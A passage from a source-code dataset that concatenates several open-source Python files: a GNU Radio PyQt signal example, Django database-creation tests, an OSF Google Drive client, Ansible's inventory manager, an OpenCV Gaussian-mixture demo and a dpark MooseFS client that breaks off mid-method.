TheWylieStCoyote/gnuradio | gr-qtgui/examples/pyqt_example_f.py | 3 | 5397 | #!/usr/bin/env python
#
# Copyright 2011,2012,2015 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
#
from __future__ import print_function
from __future__ import unicode_literals
from gnuradio import gr, filter
from gnuradio import blocks
import sys
try:
from gnuradio import qtgui
from PyQt5 import QtWidgets, Qt
import sip
except ImportError:
sys.stderr.write("Error: Program requires PyQt5 and gr-qtgui.\n")
sys.exit(1)
try:
from gnuradio import analog
except ImportError:
sys.stderr.write("Error: Program requires gr-analog.\n")
sys.exit(1)
class dialog_box(QtWidgets.QWidget):
def __init__(self, display, control):
QtWidgets.QWidget.__init__(self, None)
self.setWindowTitle('PyQt Test GUI')
self.boxlayout = QtWidgets.QBoxLayout(QtWidgets.QBoxLayout.LeftToRight, self)
self.boxlayout.addWidget(display, 1)
self.boxlayout.addWidget(control)
self.resize(800, 500)
class control_box(QtWidgets.QWidget):
def __init__(self, parent=None):
QtWidgets.QWidget.__init__(self, parent)
self.setWindowTitle('Control Panel')
self.setToolTip('Control the signals')
QtWidgets.QToolTip.setFont(Qt.QFont('OldEnglish', 10))
self.layout = QtWidgets.QFormLayout(self)
# Control the first signal
self.freq1Edit = QtWidgets.QLineEdit(self)
self.freq1Edit.setMinimumWidth(100)
self.layout.addRow("Signal 1 Frequency:", self.freq1Edit)
self.freq1Edit.editingFinished.connect(self.freq1EditText)
self.amp1Edit = QtWidgets.QLineEdit(self)
self.amp1Edit.setMinimumWidth(100)
self.layout.addRow("Signal 1 Amplitude:", self.amp1Edit)
self.amp1Edit.editingFinished.connect(self.amp1EditText)
# Control the second signal
self.freq2Edit = QtWidgets.QLineEdit(self)
self.freq2Edit.setMinimumWidth(100)
self.layout.addRow("Signal 2 Frequency:", self.freq2Edit)
self.freq2Edit.editingFinished.connect(self.freq2EditText)
self.amp2Edit = QtWidgets.QLineEdit(self)
self.amp2Edit.setMinimumWidth(100)
self.layout.addRow("Signal 2 Amplitude:", self.amp2Edit)
self.amp2Edit.editingFinished.connect(self.amp2EditText)
self.quit = QtWidgets.QPushButton('Close', self)
self.quit.setMinimumWidth(100)
self.layout.addWidget(self.quit)
self.quit.clicked.connect(QtWidgets.qApp.quit)
def attach_signal1(self, signal):
self.signal1 = signal
self.freq1Edit.setText(("{0}").format(self.signal1.frequency()))
self.amp1Edit.setText(("{0}").format(self.signal1.amplitude()))
def attach_signal2(self, signal):
self.signal2 = signal
self.freq2Edit.setText(("{0}").format(self.signal2.frequency()))
self.amp2Edit.setText(("{0}").format(self.signal2.amplitude()))
def freq1EditText(self):
try:
newfreq = float(self.freq1Edit.text())
self.signal1.set_frequency(newfreq)
except ValueError:
print("Bad frequency value entered")
def amp1EditText(self):
try:
newamp = float(self.amp1Edit.text())
self.signal1.set_amplitude(newamp)
except ValueError:
print("Bad amplitude value entered")
def freq2EditText(self):
try:
newfreq = float(self.freq2Edit.text())
self.signal2.set_frequency(newfreq)
except ValueError:
print("Bad frequency value entered")
def amp2EditText(self):
try:
newamp = float(self.amp2Edit.text())
self.signal2.set_amplitude(newamp)
except ValueError:
print("Bad amplitude value entered")
class my_top_block(gr.top_block):
def __init__(self):
gr.top_block.__init__(self)
Rs = 8000
f1 = 1000
f2 = 2000
fftsize = 2048
self.qapp = QtWidgets.QApplication(sys.argv)
src1 = analog.sig_source_f(Rs, analog.GR_SIN_WAVE, f1, 0.1, 0)
src2 = analog.sig_source_f(Rs, analog.GR_SIN_WAVE, f2, 0.1, 0)
src = blocks.add_ff()
thr = blocks.throttle(gr.sizeof_float, 100*fftsize)
noise = analog.noise_source_f(analog.GR_GAUSSIAN, 0.001)
add = blocks.add_ff()
self.snk1 = qtgui.sink_f(fftsize, filter.firdes.WIN_BLACKMAN_hARRIS,
0, Rs,
"Float Signal Example",
True, True, True, False)
self.connect(src1, (src,0))
self.connect(src2, (src,1))
self.connect(src, thr, (add,0))
self.connect(noise, (add,1))
self.connect(add, self.snk1)
self.ctrl_win = control_box()
self.ctrl_win.attach_signal1(src1)
self.ctrl_win.attach_signal2(src2)
# Get the reference pointer to the SpectrumDisplayForm QWidget
pyQt = self.snk1.pyqwidget()
# Wrap the pointer as a PyQt SIP object
# This can now be manipulated as a PyQt5.QtWidgets.QWidget
pyWin = sip.wrapinstance(pyQt, QtWidgets.QWidget)
self.main_box = dialog_box(pyWin, self.ctrl_win)
self.main_box.show()
if __name__ == "__main__":
tb = my_top_block();
tb.start()
tb.qapp.exec_()
tb.stop()
| gpl-3.0 |
carljm/django | tests/backends/test_creation.py | 26 | 3755 | import copy
import unittest
from contextlib import contextmanager
from django.db import DEFAULT_DB_ALIAS, connection, connections
from django.db.backends.base.creation import (
TEST_DATABASE_PREFIX, BaseDatabaseCreation,
)
from django.db.backends.postgresql.creation import DatabaseCreation
from django.test import SimpleTestCase
class TestDbSignatureTests(SimpleTestCase):
def get_connection_copy(self):
# Get a copy of the default connection. (Can't use django.db.connection
# because it'll modify the default connection itself.)
test_connection = copy.copy(connections[DEFAULT_DB_ALIAS])
test_connection.settings_dict = copy.copy(connections[DEFAULT_DB_ALIAS].settings_dict)
return test_connection
def test_default_name(self):
# A test db name isn't set.
prod_name = 'hodor'
test_connection = self.get_connection_copy()
test_connection.settings_dict['NAME'] = prod_name
test_connection.settings_dict['TEST'] = {'NAME': None}
signature = BaseDatabaseCreation(test_connection).test_db_signature()
self.assertEqual(signature[3], TEST_DATABASE_PREFIX + prod_name)
def test_custom_test_name(self):
# A regular test db name is set.
test_name = 'hodor'
test_connection = self.get_connection_copy()
test_connection.settings_dict['TEST'] = {'NAME': test_name}
signature = BaseDatabaseCreation(test_connection).test_db_signature()
self.assertEqual(signature[3], test_name)
def test_custom_test_name_with_test_prefix(self):
# A test db name prefixed with TEST_DATABASE_PREFIX is set.
test_name = TEST_DATABASE_PREFIX + 'hodor'
test_connection = self.get_connection_copy()
test_connection.settings_dict['TEST'] = {'NAME': test_name}
signature = BaseDatabaseCreation(test_connection).test_db_signature()
self.assertEqual(signature[3], test_name)
@unittest.skipUnless(connection.vendor == 'postgresql', "PostgreSQL-specific tests")
class PostgreSQLDatabaseCreationTests(SimpleTestCase):
@contextmanager
def changed_test_settings(self, **kwargs):
settings = connection.settings_dict['TEST']
saved_values = {}
for name in kwargs:
if name in settings:
saved_values[name] = settings[name]
for name, value in kwargs.items():
settings[name] = value
try:
yield
finally:
for name, value in kwargs.items():
if name in saved_values:
settings[name] = saved_values[name]
else:
del settings[name]
def check_sql_table_creation_suffix(self, settings, expected):
with self.changed_test_settings(**settings):
creation = DatabaseCreation(connection)
suffix = creation.sql_table_creation_suffix()
self.assertEqual(suffix, expected)
def test_sql_table_creation_suffix_with_none_settings(self):
settings = dict(CHARSET=None, TEMPLATE=None)
self.check_sql_table_creation_suffix(settings, "")
def test_sql_table_creation_suffix_with_encoding(self):
settings = dict(CHARSET='UTF8')
self.check_sql_table_creation_suffix(settings, "WITH ENCODING 'UTF8'")
def test_sql_table_creation_suffix_with_template(self):
settings = dict(TEMPLATE='template0')
self.check_sql_table_creation_suffix(settings, 'WITH TEMPLATE "template0"')
def test_sql_table_creation_suffix_with_encoding_and_template(self):
settings = dict(CHARSET='UTF8', TEMPLATE='template0')
self.check_sql_table_creation_suffix(settings, '''WITH ENCODING 'UTF8' TEMPLATE "template0"''')
| bsd-3-clause |
RomanZWang/osf.io | website/addons/googledrive/client.py | 26 | 1530 | # -*- coding: utf-8 -*-
from framework.exceptions import HTTPError
from website.util.client import BaseClient
from website.addons.googledrive import settings
class GoogleAuthClient(BaseClient):
def userinfo(self, access_token):
return self._make_request(
'GET',
self._build_url(settings.API_BASE_URL, 'oauth2', 'v3', 'userinfo'),
params={'access_token': access_token},
expects=(200, ),
throws=HTTPError(401)
).json()
class GoogleDriveClient(BaseClient):
def __init__(self, access_token=None):
self.access_token = access_token
@property
def _default_headers(self):
if self.access_token:
return {'authorization': 'Bearer {}'.format(self.access_token)}
return {}
def about(self):
return self._make_request(
'GET',
self._build_url(settings.API_BASE_URL, 'drive', 'v2', 'about', ),
expects=(200, ),
throws=HTTPError(401)
).json()
def folders(self, folder_id='root'):
query = ' and '.join([
"'{0}' in parents".format(folder_id),
'trashed = false',
"mimeType = 'application/vnd.google-apps.folder'",
])
res = self._make_request(
'GET',
self._build_url(settings.API_BASE_URL, 'drive', 'v2', 'files', ),
params={'q': query},
expects=(200, ),
throws=HTTPError(401)
)
return res.json()['items']
| apache-2.0 |
jmighion/ansible | lib/ansible/inventory/manager.py | 4 | 22984 | # (c) 2012-2014, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#############################################
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import fnmatch
import os
import re
import itertools
from ansible import constants as C
from ansible.errors import AnsibleError, AnsibleOptionsError, AnsibleParserError
from ansible.inventory.data import InventoryData
from ansible.module_utils.six import string_types
from ansible.module_utils._text import to_bytes, to_native
from ansible.parsing.utils.addresses import parse_address
from ansible.plugins.loader import PluginLoader
from ansible.utils.path import unfrackpath
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
IGNORED_ALWAYS = [b"^\.", b"^host_vars$", b"^group_vars$", b"^vars_plugins$"]
IGNORED_PATTERNS = [to_bytes(x) for x in C.INVENTORY_IGNORE_PATTERNS]
IGNORED_EXTS = [b'%s$' % to_bytes(re.escape(x)) for x in C.INVENTORY_IGNORE_EXTS]
IGNORED = re.compile(b'|'.join(IGNORED_ALWAYS + IGNORED_PATTERNS + IGNORED_EXTS))
def order_patterns(patterns):
''' takes a list of patterns and reorders them by modifier to apply them consistently '''
# FIXME: this goes away if we apply patterns incrementally or by groups
pattern_regular = []
pattern_intersection = []
pattern_exclude = []
for p in patterns:
if p.startswith("!"):
pattern_exclude.append(p)
elif p.startswith("&"):
pattern_intersection.append(p)
elif p:
pattern_regular.append(p)
# if no regular pattern was given, hence only exclude and/or intersection
# make that magically work
if pattern_regular == []:
pattern_regular = ['all']
# when applying the host selectors, run those without the "&" or "!"
# first, then the &s, then the !s.
return pattern_regular + pattern_intersection + pattern_exclude
def split_host_pattern(pattern):
"""
Takes a string containing host patterns separated by commas (or a list
thereof) and returns a list of single patterns (which may not contain
commas). Whitespace is ignored.
Also accepts ':' as a separator for backwards compatibility, but it is
not recommended due to the conflict with IPv6 addresses and host ranges.
Example: 'a,b[1], c[2:3] , d' -> ['a', 'b[1]', 'c[2:3]', 'd']
"""
if isinstance(pattern, list):
return list(itertools.chain(*map(split_host_pattern, pattern)))
# If it's got commas in it, we'll treat it as a straightforward
# comma-separated list of patterns.
elif ',' in pattern:
patterns = re.split('\s*,\s*', pattern)
# If it doesn't, it could still be a single pattern. This accounts for
# non-separator uses of colons: IPv6 addresses and [x:y] host ranges.
else:
try:
(base, port) = parse_address(pattern, allow_ranges=True)
patterns = [pattern]
except:
# The only other case we accept is a ':'-separated list of patterns.
# This mishandles IPv6 addresses, and is retained only for backwards
# compatibility.
patterns = re.findall(
r'''(?: # We want to match something comprising:
[^\s:\[\]] # (anything other than whitespace or ':[]'
| # ...or...
\[[^\]]*\] # a single complete bracketed expression)
)+ # occurring once or more
''', pattern, re.X
)
return [p.strip() for p in patterns]
class InventoryManager(object):
''' Creates and manages inventory '''
def __init__(self, loader, sources=None):
# base objects
self._loader = loader
self._inventory = InventoryData()
# a list of host(names) to contain current inquiries to
self._restriction = None
self._subset = None
# caches
self._hosts_patterns_cache = {} # resolved full patterns
self._pattern_cache = {} # resolved individual patterns
self._inventory_plugins = [] # for generating inventory
# the inventory dirs, files, script paths or lists of hosts
if sources is None:
self._sources = []
elif isinstance(sources, string_types):
self._sources = [sources]
else:
self._sources = sources
# get to work!
self.parse_sources()
@property
def localhost(self):
return self._inventory.localhost
@property
def groups(self):
return self._inventory.groups
@property
def hosts(self):
return self._inventory.hosts
def get_vars(self, *args, **kwargs):
return self._inventory.get_vars(args, kwargs)
def add_host(self, host, group=None, port=None):
return self._inventory.add_host(host, group, port)
def add_group(self, group):
return self._inventory.add_group(group)
def get_groups_dict(self):
return self._inventory.get_groups_dict()
def reconcile_inventory(self):
self.clear_caches()
return self._inventory.reconcile_inventory()
def get_host(self, hostname):
return self._inventory.get_host(hostname)
def _setup_inventory_plugins(self):
''' sets up loaded inventory plugins for usage '''
inventory_loader = PluginLoader('InventoryModule', 'ansible.plugins.inventory', C.DEFAULT_INVENTORY_PLUGIN_PATH, 'inventory_plugins')
display.vvvv('setting up inventory plugins')
for name in C.INVENTORY_ENABLED:
plugin = inventory_loader.get(name)
if plugin:
self._inventory_plugins.append(plugin)
else:
display.warning('Failed to load inventory plugin, skipping %s' % name)
if not self._inventory_plugins:
raise AnsibleError("No inventory plugins available to generate inventory, make sure you have at least one whitelisted.")
def parse_sources(self, cache=False):
''' iterate over inventory sources and parse each one to populate it'''
self._setup_inventory_plugins()
parsed = False
# allow for multiple inventory parsing
for source in self._sources:
if source:
if ',' not in source:
source = unfrackpath(source, follow=False)
parse = self.parse_source(source, cache=cache)
if parse and not parsed:
parsed = True
if parsed:
# do post processing
self._inventory.reconcile_inventory()
else:
display.warning("No inventory was parsed, only implicit localhost is available")
self._inventory_plugins = []
def parse_source(self, source, cache=False):
''' Generate or update inventory for the source provided '''
parsed = False
display.debug(u'Examining possible inventory source: %s' % source)
b_source = to_bytes(source)
# process directories as a collection of inventories
if os.path.isdir(b_source):
display.debug(u'Searching for inventory files in directory: %s' % source)
for i in sorted(os.listdir(b_source)):
display.debug(u'Considering %s' % i)
# Skip hidden files and stuff we explicitly ignore
if IGNORED.search(i):
continue
# recursively deal with directory entries
fullpath = os.path.join(b_source, i)
parsed_this_one = self.parse_source(to_native(fullpath))
display.debug(u'parsed %s as %s' % (fullpath, parsed_this_one))
if not parsed:
parsed = parsed_this_one
else:
# left with strings or files, let plugins figure it out
# set so new hosts can use for inventory_file/dir vasr
self._inventory.current_source = source
# get inventory plugins if needed, there should always be at least one generator
if not self._inventory_plugins:
self._setup_inventory_plugins()
# try source with each plugin
failures = []
for plugin in self._inventory_plugins:
plugin_name = to_native(getattr(plugin, '_load_name', getattr(plugin, '_original_path', '')))
display.debug(u'Attempting to use plugin %s (%s)' % (plugin_name, plugin._original_path))
# initialize
if plugin.verify_file(source):
try:
plugin.parse(self._inventory, self._loader, source, cache=cache)
parsed = True
display.vvv('Parsed %s inventory source with %s plugin' % (to_native(source), plugin_name))
break
except AnsibleParserError as e:
display.debug('%s did not meet %s requirements' % (to_native(source), plugin_name))
failures.append({'src': source, 'plugin': plugin_name, 'exc': e})
else:
display.debug('%s did not meet %s requirements' % (to_native(source), plugin_name))
else:
if not parsed and failures:
# only if no plugin processed files should we show errors.
if C.INVENTORY_UNPARSED_IS_FAILED:
msg = "Could not parse inventory source %s with available plugins:\n" % source
for fail in failures:
msg += 'Plugin %s failed: %s\n' % (fail['plugin'], to_native(fail['exc']))
if display.verbosity >= 3:
msg += "%s\n" % fail['exc'].tb
raise AnsibleParserError(msg)
else:
for fail in failures:
display.warning('\n* Failed to parse %s with %s plugin: %s' % (to_native(fail['src']), fail['plugin'], to_native(fail['exc'])))
display.vvv(fail['exc'].tb)
if not parsed:
display.warning("Unable to parse %s as an inventory source" % to_native(source))
# clear up, jic
self._inventory.current_source = None
return parsed
def clear_caches(self):
''' clear all caches '''
self._hosts_patterns_cache = {}
self._pattern_cache = {}
# FIXME: flush inventory cache
def refresh_inventory(self):
''' recalculate inventory '''
self.clear_caches()
self._inventory = InventoryData()
self.parse_sources(cache=False)
def _match_list(self, items, pattern_str):
# compile patterns
try:
if not pattern_str.startswith('~'):
pattern = re.compile(fnmatch.translate(pattern_str))
else:
pattern = re.compile(pattern_str[1:])
except Exception:
raise AnsibleError('Invalid host list pattern: %s' % pattern_str)
# apply patterns
results = []
for item in items:
if pattern.match(item):
results.append(item)
return results
def get_hosts(self, pattern="all", ignore_limits=False, ignore_restrictions=False, order=None):
"""
Takes a pattern or list of patterns and returns a list of matching
inventory host names, taking into account any active restrictions
or applied subsets
"""
# Check if pattern already computed
if isinstance(pattern, list):
pattern_hash = u":".join(pattern)
else:
pattern_hash = pattern
if not ignore_limits and self._subset:
pattern_hash += ":%s" % to_native(self._subset)
if not ignore_restrictions and self._restriction:
pattern_hash += ":%s" % to_native(self._restriction)
if pattern_hash not in self._hosts_patterns_cache:
patterns = split_host_pattern(pattern)
hosts = self._evaluate_patterns(patterns)
# mainly useful for hostvars[host] access
if not ignore_limits and self._subset:
# exclude hosts not in a subset, if defined
subset = self._evaluate_patterns(self._subset)
hosts = [h for h in hosts if h in subset]
if not ignore_restrictions and self._restriction:
# exclude hosts mentioned in any restriction (ex: failed hosts)
hosts = [h for h in hosts if h.name in self._restriction]
seen = set()
self._hosts_patterns_cache[pattern_hash] = [x for x in hosts if x not in seen and not seen.add(x)]
# sort hosts list if needed (should only happen when called from strategy)
if order in ['sorted', 'reverse_sorted']:
from operator import attrgetter
hosts = sorted(self._hosts_patterns_cache[pattern_hash][:], key=attrgetter('name'), reverse=(order == 'reverse_sorted'))
elif order == 'reverse_inventory':
hosts = sorted(self._hosts_patterns_cache[pattern_hash][:], reverse=True)
else:
hosts = self._hosts_patterns_cache[pattern_hash][:]
if order == 'shuffle':
from random import shuffle
shuffle(hosts)
elif order not in [None, 'inventory']:
AnsibleOptionsError("Invalid 'order' specified for inventory hosts: %s" % order)
return hosts
def _evaluate_patterns(self, patterns):
"""
Takes a list of patterns and returns a list of matching host names,
taking into account any negative and intersection patterns.
"""
patterns = order_patterns(patterns)
hosts = []
for p in patterns:
# avoid resolving a pattern that is a plain host
if p in self._inventory.hosts:
hosts.append(self._inventory.get_host(p))
else:
that = self._match_one_pattern(p)
if p.startswith("!"):
hosts = [h for h in hosts if h not in frozenset(that)]
elif p.startswith("&"):
hosts = [h for h in hosts if h in frozenset(that)]
else:
hosts.extend([h for h in that if h.name not in frozenset([y.name for y in hosts])])
return hosts
def _match_one_pattern(self, pattern):
"""
Takes a single pattern and returns a list of matching host names.
Ignores intersection (&) and exclusion (!) specifiers.
The pattern may be:
1. A regex starting with ~, e.g. '~[abc]*'
2. A shell glob pattern with ?/*/[chars]/[!chars], e.g. 'foo*'
3. An ordinary word that matches itself only, e.g. 'foo'
The pattern is matched using the following rules:
1. If it's 'all', it matches all hosts in all groups.
2. Otherwise, for each known group name:
(a) if it matches the group name, the results include all hosts
in the group or any of its children.
(b) otherwise, if it matches any hosts in the group, the results
include the matching hosts.
This means that 'foo*' may match one or more groups (thus including all
hosts therein) but also hosts in other groups.
The built-in groups 'all' and 'ungrouped' are special. No pattern can
match these group names (though 'all' behaves as though it matches, as
described above). The word 'ungrouped' can match a host of that name,
and patterns like 'ungr*' and 'al*' can match either hosts or groups
other than all and ungrouped.
If the pattern matches one or more group names according to these rules,
it may have an optional range suffix to select a subset of the results.
This is allowed only if the pattern is not a regex, i.e. '~foo[1]' does
not work (the [1] is interpreted as part of the regex), but 'foo*[1]'
would work if 'foo*' matched the name of one or more groups.
Duplicate matches are always eliminated from the results.
"""
if pattern.startswith("&") or pattern.startswith("!"):
pattern = pattern[1:]
if pattern not in self._pattern_cache:
(expr, slice) = self._split_subscript(pattern)
hosts = self._enumerate_matches(expr)
try:
hosts = self._apply_subscript(hosts, slice)
except IndexError:
raise AnsibleError("No hosts matched the subscripted pattern '%s'" % pattern)
self._pattern_cache[pattern] = hosts
return self._pattern_cache[pattern]
def _split_subscript(self, pattern):
"""
Takes a pattern, checks if it has a subscript, and returns the pattern
without the subscript and a (start,end) tuple representing the given
subscript (or None if there is no subscript).
Validates that the subscript is in the right syntax, but doesn't make
sure the actual indices make sense in context.
"""
# Do not parse regexes for enumeration info
if pattern.startswith('~'):
return (pattern, None)
# We want a pattern followed by an integer or range subscript.
# (We can't be more restrictive about the expression because the
# fnmatch semantics permit [\[:\]] to occur.)
pattern_with_subscript = re.compile(
r'''^
(.+) # A pattern expression ending with...
\[(?: # A [subscript] expression comprising:
(-?[0-9]+)| # A single positive or negative number
([0-9]+)([:-]) # Or an x:y or x: range.
([0-9]*)
)\]
$
''', re.X
)
subscript = None
m = pattern_with_subscript.match(pattern)
if m:
(pattern, idx, start, sep, end) = m.groups()
if idx:
subscript = (int(idx), None)
else:
if not end:
end = -1
subscript = (int(start), int(end))
if sep == '-':
display.warning("Use [x:y] inclusive subscripts instead of [x-y] which has been removed")
return (pattern, subscript)
def _apply_subscript(self, hosts, subscript):
"""
Takes a list of hosts and a (start,end) tuple and returns the subset of
hosts based on the subscript (which may be None to return all hosts).
"""
if not hosts or not subscript:
return hosts
(start, end) = subscript
if end:
if end == -1:
end = len(hosts) - 1
return hosts[start:end + 1]
else:
return [hosts[start]]
def _enumerate_matches(self, pattern):
"""
Returns a list of host names matching the given pattern according to the
rules explained above in _match_one_pattern.
"""
results = []
# check if pattern matches group
matching_groups = self._match_list(self._inventory.groups, pattern)
if matching_groups:
for groupname in matching_groups:
results.extend(self._inventory.groups[groupname].get_hosts())
else:
# pattern might match host
matching_hosts = self._match_list(self._inventory.hosts, pattern)
if matching_hosts:
for hostname in matching_hosts:
results.append(self._inventory.hosts[hostname])
if not results and pattern in C.LOCALHOST:
# get_host autocreates implicit when needed
implicit = self._inventory.get_host(pattern)
if implicit:
results.append(implicit)
if not results:
display.warning("Could not match supplied host pattern, ignoring: %s" % pattern)
return results
def list_hosts(self, pattern="all"):
""" return a list of hostnames for a pattern """
# FIXME: cache?
result = [h for h in self.get_hosts(pattern)]
# allow implicit localhost if pattern matches and no other results
if len(result) == 0 and pattern in C.LOCALHOST:
result = [pattern]
return result
def list_groups(self):
# FIXME: cache?
return sorted(self._inventory.groups.keys(), key=lambda x: x)
def restrict_to_hosts(self, restriction):
"""
Restrict list operations to the hosts given in restriction. This is used
to batch serial operations in main playbook code, don't use this for other
reasons.
"""
if restriction is None:
return
elif not isinstance(restriction, list):
restriction = [restriction]
self._restriction = [h.name for h in restriction]
def subset(self, subset_pattern):
"""
Limits inventory results to a subset of inventory that matches a given
pattern, such as to select a given geographic of numeric slice amongst
a previous 'hosts' selection that only select roles, or vice versa.
Corresponds to --limit parameter to ansible-playbook
"""
if subset_pattern is None:
self._subset = None
else:
subset_patterns = split_host_pattern(subset_pattern)
results = []
# allow Unix style @filename data
for x in subset_patterns:
if x.startswith("@"):
fd = open(x[1:])
results.extend(fd.read().split("\n"))
fd.close()
else:
results.append(x)
self._subset = results
def remove_restriction(self):
""" Do not restrict list operations """
self._restriction = None
def clear_pattern_cache(self):
self._pattern_cache = {}
| gpl-3.0 |
i4Ds/IRE | IREMedia/libraries/OpenCV/samples/python2/gaussian_mix.py | 7 | 1822 | #!/usr/bin/env python
import numpy as np
from numpy import random
import cv2
def make_gaussians(cluster_n, img_size):
points = []
ref_distrs = []
for i in xrange(cluster_n):
mean = (0.1 + 0.8*random.rand(2)) * img_size
a = (random.rand(2, 2)-0.5)*img_size*0.1
cov = np.dot(a.T, a) + img_size*0.05*np.eye(2)
n = 100 + random.randint(900)
pts = random.multivariate_normal(mean, cov, n)
points.append( pts )
ref_distrs.append( (mean, cov) )
points = np.float32( np.vstack(points) )
return points, ref_distrs
def draw_gaussain(img, mean, cov, color):
x, y = np.int32(mean)
w, u, vt = cv2.SVDecomp(cov)
ang = np.arctan2(u[1, 0], u[0, 0])*(180/np.pi)
s1, s2 = np.sqrt(w)*3.0
cv2.ellipse(img, (x, y), (s1, s2), ang, 0, 360, color, 1, cv2.CV_AA)
if __name__ == '__main__':
cluster_n = 5
img_size = 512
print 'press any key to update distributions, ESC - exit\n'
while True:
print 'sampling distributions...'
points, ref_distrs = make_gaussians(cluster_n, img_size)
print 'EM (opencv) ...'
em = cv2.EM(cluster_n, cv2.EM_COV_MAT_GENERIC)
em.train(points)
means = em.getMat('means')
covs = em.getMatVector('covs')
found_distrs = zip(means, covs)
print 'ready!\n'
img = np.zeros((img_size, img_size, 3), np.uint8)
for x, y in np.int32(points):
cv2.circle(img, (x, y), 1, (255, 255, 255), -1)
for m, cov in ref_distrs:
draw_gaussain(img, m, cov, (0, 255, 0))
for m, cov in found_distrs:
draw_gaussain(img, m, cov, (0, 0, 255))
cv2.imshow('gaussian mixture', img)
ch = 0xFF & cv2.waitKey(0)
if ch == 27:
break
cv2.destroyAllWindows()
| apache-2.0 |
fe11x/dpark | dpark/moosefs/master.py | 14 | 10945 | import os
import socket
import threading
import Queue
import time
import struct
import logging
from consts import *
from utils import *
logger = logging.getLogger(__name__)
# mfsmaster need to been patched with dcache
ENABLE_DCACHE = False
class StatInfo:
def __init__(self, totalspace, availspace, trashspace,
reservedspace, inodes):
self.totalspace = totalspace
self.availspace = availspace
self.trashspace = trashspace
self.reservedspace = reservedspace
self.inodes = inodes
class Chunk:
def __init__(self, id, length, version, csdata):
self.id = id
self.length = length
self.version = version
self.addrs = self._parse(csdata)
def _parse(self, csdata):
return [(socket.inet_ntoa(csdata[i:i+4]),
unpack("H", csdata[i+4:i+6])[0])
for i in range(len(csdata))[::6]]
def __repr__(self):
return "<Chunk(%d, %d, %d)>" % (self.id, self.version, self.length)
def try_again(f):
def _(self, *a, **kw):
for i in range(3):
try:
return f(self, *a, **kw)
except IOError, e:
self.close()
logger.warning("mfs master connection: %s", e)
time.sleep(2**i*0.1)
else:
raise
return _
def spawn(target, *args, **kw):
t = threading.Thread(target=target, name=target.__name__, args=args, kwargs=kw)
t.daemon = True
t.start()
return t
class MasterConn:
def __init__(self, host='mfsmaster', port=9421):
self.host = host
self.port = port
self.uid = os.getuid()
self.gid = os.getgid()
self.sessionid = 0
self.conn = None
self.packetid = 0
self.fail_count = 0
self.dcache = {}
self.dstat = {}
self.lock = threading.RLock()
self.reply = Queue.Queue()
self.is_ready = False
spawn(self.heartbeat)
spawn(self.recv_thread)
def heartbeat(self):
while True:
try:
self.nop()
except Exception, e:
self.close()
time.sleep(2)
def connect(self):
if self.conn is not None:
return
for _ in range(10):
try:
self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.conn.connect((self.host, self.port))
break
except socket.error, e:
self.conn = None
#self.next_try = time.time() + 1.5 ** self.fail_count
self.fail_count += 1
time.sleep(1.5 ** self.fail_count)
if not self.conn:
raise IOError("mfsmaster not availbale")
regbuf = pack(CUTOMA_FUSE_REGISTER, FUSE_REGISTER_BLOB_NOACL,
self.sessionid, VERSION)
self.send(regbuf)
recv = self.recv(8)
cmd, i = unpack("II", recv)
if cmd != MATOCU_FUSE_REGISTER:
raise Exception("got incorrect answer from mfsmaster %s" % cmd)
if i not in (1, 4):
raise Exception("got incorrect size from mfsmaster")
data = self.recv(i)
if i == 1:
code, = unpack("B", data)
if code != 0:
raise Exception("mfsmaster register error: "
+ mfs_strerror(code))
if self.sessionid == 0:
self.sessionid, = unpack("I", data)
self.is_ready = True
def close(self):
with self.lock:
if self.conn:
self.conn.close()
self.conn = None
self.dcache.clear()
self.is_ready = False
def send(self, buf):
with self.lock:
conn = self.conn
if not conn:
raise IOError("not connected")
n = conn.send(buf)
while n < len(buf):
sent = conn.send(buf[n:])
if not sent:
self.close()
raise IOError("write to master failed")
n += sent
def nop(self):
with self.lock:
self.connect()
msg = pack(ANTOAN_NOP, 0)
self.send(msg)
def recv(self, n):
with self.lock:
conn = self.conn
if not conn:
raise IOError("not connected")
r = conn.recv(n)
while len(r) < n:
rr = conn.recv(n - len(r))
if not rr:
self.close()
raise IOError("unexpected error: need %d" % (n-len(r)))
r += rr
return r
def recv_cmd(self):
d = self.recv(12)
cmd, size = unpack("II", d)
data = self.recv(size-4) if size > 4 else ''
while cmd in (ANTOAN_NOP, MATOCU_FUSE_NOTIFY_ATTR, MATOCU_FUSE_NOTIFY_DIR):
if cmd == ANTOAN_NOP:
pass
elif cmd == MATOCU_FUSE_NOTIFY_ATTR:
while len(data) >= 43:
parent, inode = unpack("II", data)
attr = data[8:43]
if parent in self.dcache:
cache = self.dcache[parent]
for name in cache:
if cache[name].inode == inode:
cache[name] = attrToFileInfo(inode, attr)
break
data = data[43:]
elif cmd == MATOCU_FUSE_NOTIFY_DIR:
while len(data) >= 4:
inode, = unpack("I", data)
if inode in self.dcache:
del self.dcache[inode]
with self.lock:
self.send(pack(CUTOMA_FUSE_DIR_REMOVED, 0, inode))
data = data[4:]
d = self.recv(12)
cmd, size = unpack("II", d)
data = self.recv(size-4) if size > 4 else ''
return d, data
def recv_thread(self):
while True:
with self.lock:
if not self.is_ready:
time.sleep(0.01)
continue
try:
r = self.recv_cmd()
self.reply.put(r)
except IOError, e:
self.reply.put(e)
@try_again
def sendAndReceive(self, cmd, *args):
#print 'sendAndReceive', cmd, args
self.packetid += 1
msg = pack(cmd, self.packetid, *args)
with self.lock:
self.connect()
while not self.reply.empty():
self.reply.get_nowait()
self.send(msg)
r = self.reply.get()
if isinstance(r, Exception):
raise r
h, d = r
rcmd, size, pid = unpack("III", h)
if rcmd != cmd+1 or pid != self.packetid or size <= 4:
self.close()
raise Exception("incorrect answer (%s!=%s, %s!=%s, %d<=4",
rcmd, cmd+1, pid, self.packetid, size)
if len(d) == 1 and ord(d[0]) != 0:
raise Error(ord(d[0]))
return d
def statfs(self):
ans = self.sendAndReceive(CUTOMA_FUSE_STATFS)
